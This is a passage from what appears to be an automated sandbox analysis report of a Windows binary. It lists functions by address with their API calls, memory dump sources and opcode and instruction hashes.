                                                                            • Instruction ID: d2f84b06e7871f9cf9b9bcfea2fd88df6842a881ff06ed566c806df71e7ab448
                                                                            • Opcode Fuzzy Hash: 81040521ad41993b8c03e0ced297aa46e96b58a65889e78eecfbead36f710734
                                                                            • Instruction Fuzzy Hash: 780186B5A04208FBEB04DF90EC89BED7774EF88700F108519F605AB280F7799944C754
                                                                            Function 007C5720 Relevance: 4.5, APIs: 3, Instructions: 11memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0083CB2C,?,007D3EE3), ref: 007C5728
                                                                            • IsWow64Process.KERNEL32(00000000,?,007D3EE3), ref: 007C572F
                                                                            • GetProcessHeap.KERNEL32(?,007D3EE3), ref: 007C5735
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CurrentHeapWow64
                                                                            • String ID:
                                                                            • API String ID: 1399170734-0
                                                                            • Opcode ID: 6a91e827e887e2adb63dba58c59af332e0e88aeb56f57c87fbd7578df20e333a
                                                                            • Instruction ID: 2887ff6c1fa7e1a35c372195cd0bc36163e38e5c7a8d0aac5a3c504d76b7a789
                                                                            • Opcode Fuzzy Hash: 6a91e827e887e2adb63dba58c59af332e0e88aeb56f57c87fbd7578df20e333a
                                                                            • Instruction Fuzzy Hash: 5FC01233815204ABC2002BB4ED0E624BBA8FB487A1B408022F509C2262CE7A5842CB68
                                                                            Function 007DC031 Relevance: 3.0, APIs: 2, Instructions: 16encryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                            • String ID:
                                                                            • API String ID: 3989222877-0
                                                                            • Opcode ID: 1f997026327d8feff8b771a661ac89db1acfaac562194332fbfbff765ab7d02e
                                                                            • Instruction ID: 0b944b1017d314c7e420e7d4d41c9d658aabc82fc74fcd7ff3969d8eadf9c150
                                                                            • Opcode Fuzzy Hash: 1f997026327d8feff8b771a661ac89db1acfaac562194332fbfbff765ab7d02e
                                                                            • Instruction Fuzzy Hash: 6AE01735901208EBCB15DBA4E998BADB774FB44709F108586E904A22A0C3795A84DB80
                                                                            Function 007DC00C Relevance: 3.0, APIs: 2, Instructions: 16encryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                            • String ID:
                                                                            • API String ID: 3989222877-0
                                                                            • Opcode ID: 91fe7db979a346df88a25c2fa2e30176ffa8a706de19925e4ce90bb2e2d8bc46
                                                                            • Instruction ID: 0b944b1017d314c7e420e7d4d41c9d658aabc82fc74fcd7ff3969d8eadf9c150
                                                                            • Opcode Fuzzy Hash: 91fe7db979a346df88a25c2fa2e30176ffa8a706de19925e4ce90bb2e2d8bc46
                                                                            • Instruction Fuzzy Hash: 6AE01735901208EBCB15DBA4E998BADB774FB44709F108586E904A22A0C3795A84DB80
                                                                            Function 007DBFD9 Relevance: 3.0, APIs: 2, Instructions: 16encryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                            • String ID:
                                                                            • API String ID: 3989222877-0
                                                                            • Opcode ID: ad2efd105bb5aece2daa65fcdb4587d38bb67473474f45fdc6993ca845b02a54
                                                                            • Instruction ID: 0b944b1017d314c7e420e7d4d41c9d658aabc82fc74fcd7ff3969d8eadf9c150
                                                                            • Opcode Fuzzy Hash: ad2efd105bb5aece2daa65fcdb4587d38bb67473474f45fdc6993ca845b02a54
                                                                            • Instruction Fuzzy Hash: 6AE01735901208EBCB15DBA4E998BADB774FB44709F108586E904A22A0C3795A84DB80
                                                                            Function 007DBFB6 Relevance: 3.0, APIs: 2, Instructions: 16encryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                            • String ID:
                                                                            • API String ID: 3989222877-0
                                                                            • Opcode ID: b6fe038029a45d9d148558717c8be783f5c46edc437d7c4686ef2b705301c0d3
                                                                            • Instruction ID: 0b944b1017d314c7e420e7d4d41c9d658aabc82fc74fcd7ff3969d8eadf9c150
                                                                            • Opcode Fuzzy Hash: b6fe038029a45d9d148558717c8be783f5c46edc437d7c4686ef2b705301c0d3
                                                                            • Instruction Fuzzy Hash: 6AE01735901208EBCB15DBA4E998BADB774FB44709F108586E904A22A0C3795A84DB80
                                                                            Function 007D1690 Relevance: 1.9, Strings: 1, Instructions: 663COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: da476ffe59913d7d5caf7e5f659aba0fb4c2d5a17d422f329ab8587546812b84
                                                                            • Instruction ID: 735bae394d01ebe08ae08e416c6ecb6eebf3b270a0444913ea9b1944a94019f1
                                                                            • Opcode Fuzzy Hash: da476ffe59913d7d5caf7e5f659aba0fb4c2d5a17d422f329ab8587546812b84
                                                                            • Instruction Fuzzy Hash: 6372AFB4A052299BDB65CF58CC98BE9B7B2BF98304F1481DAD409AB345D735AE81CF40
                                                                            Function 007DF690 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007E0790: WSACreateEvent.WS2_32 ref: 007E0796
                                                                              • Part of subcall function 007E0790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 007E07B3
                                                                              • Part of subcall function 007E0790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E07F3
                                                                              • Part of subcall function 007E0790: WSACloseEvent.WS2_32(00000000), ref: 007E0800
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007DF6EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseCreateEventsInfoLocaleMultipleSelectWait___crt
                                                                            • String ID:
                                                                            • API String ID: 3201519519-0
                                                                            • Opcode ID: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                                                                            • Instruction ID: 2fe4e219268ab508a79425c936ffa4f6c42cbfd1004033172ec4283faa31aaa9
                                                                            • Opcode Fuzzy Hash: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                                                                            • Instruction Fuzzy Hash: FD21C7B5D00209EFCB04DF98C894AEEB7B5FF48314F54859AE825A7341D738AA51CF90
                                                                            Function 007DF730 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007E0870: WSACreateEvent.WS2_32 ref: 007E0876
                                                                              • Part of subcall function 007E0870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 007E0893
                                                                              • Part of subcall function 007E0870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E08D3
                                                                              • Part of subcall function 007E0870: WSACloseEvent.WS2_32(00000000), ref: 007E08E0
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007DF78A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseCreateEventsInfoLocaleMultipleSelectWait___crt
                                                                            • String ID:
                                                                            • API String ID: 3201519519-0
                                                                            • Opcode ID: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                                                                            • Instruction ID: be6557e41130bcd113f3bead87f5704bbf08f211290a1393bca78cfd2dea07a2
                                                                            • Opcode Fuzzy Hash: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                                                                            • Instruction Fuzzy Hash: B621D8B5D00209EFDB04DF98C884AEEBBB5FF48314F50859AE825A7385D7389A51CF90
                                                                            Function 007EA950 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0002A90E), ref: 007EA955
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 2cbebf97eeabf4b37e3eb3e0830015d536233b21857b88e33bd9b772033d90b0
                                                                            • Instruction ID: 6d1cd2baa6fb0d6324c8996d3de796fd34a5a92c7684c58fbc9265d131e8865f
                                                                            • Opcode Fuzzy Hash: 2cbebf97eeabf4b37e3eb3e0830015d536233b21857b88e33bd9b772033d90b0
                                                                            • Instruction Fuzzy Hash: 599002E129218866460017755C4E51527905B4C65AB4344A16101C4156DB58A082D51A
                                                                            Function 007F1B14 Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: N@
                                                                            • API String ID: 0-1509896676
                                                                            • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                            • Instruction ID: d74b4b2b190a6a46cf22da180cf4205b9f8a63dea72a4001ef3e74b2e9750a9d
                                                                            • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                            • Instruction Fuzzy Hash: A5615AB1900319CFCB18CF49C4946AABBF2FF84310F5AC5AED9095B362D7B59955CB80
                                                                            Function 007DAE80 Relevance: .4, Instructions: 370COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 31558104a317b0c24d7d5327b84cbf52693d656ac7f0eb4bfecfa78fb2be7474
                                                                            • Instruction ID: f9fb06f9f2597bc81e916aaa0e5a3d554771993f7efea87cdd88ac89a6c5b108
                                                                            • Opcode Fuzzy Hash: 31558104a317b0c24d7d5327b84cbf52693d656ac7f0eb4bfecfa78fb2be7474
                                                                            • Instruction Fuzzy Hash: 46F17C71D0111DDBDF18CF9DD9919EEBBB2BF88308F248259D422B7345C634AA52CB98
                                                                            Function 007E5814 Relevance: .4, Instructions: 355COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                            • Instruction ID: 6cf1fc7e1076bda7ba948c747974ba813bfc9a7358da7b25862c23907ac62424
                                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                            • Instruction Fuzzy Hash: 33C1B673D1B9F649C735462F045823FEEA26E85B4832FC395DCD03F289C62A6D1596E0
                                                                            Function 007E542C Relevance: .3, Instructions: 349COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                            • Instruction ID: f4c2506592ca7412a75e608a89bbecb455f26e2f585badec1b7ac550fcf85dd9
                                                                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                            • Instruction Fuzzy Hash: 4DC1A173D0B9F245CB36462F041823FEEA26E95B4932FC395DCD03F299C62A6D1596E0
                                                                            Function 007E505A Relevance: .3, Instructions: 332COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                            • Instruction ID: dd63af8d5ceb46b0a4ae782b2112bee8f8142c41f8da4d659aa3b3c19eda8cbc
                                                                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                            • Instruction Fuzzy Hash: 4FC19373D0F9F6068B36462F045823FEEA16E85B4932FC395DCD03F289C62A6D0596E0
                                                                            Function 007E4CBC Relevance: .3, Instructions: 326COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
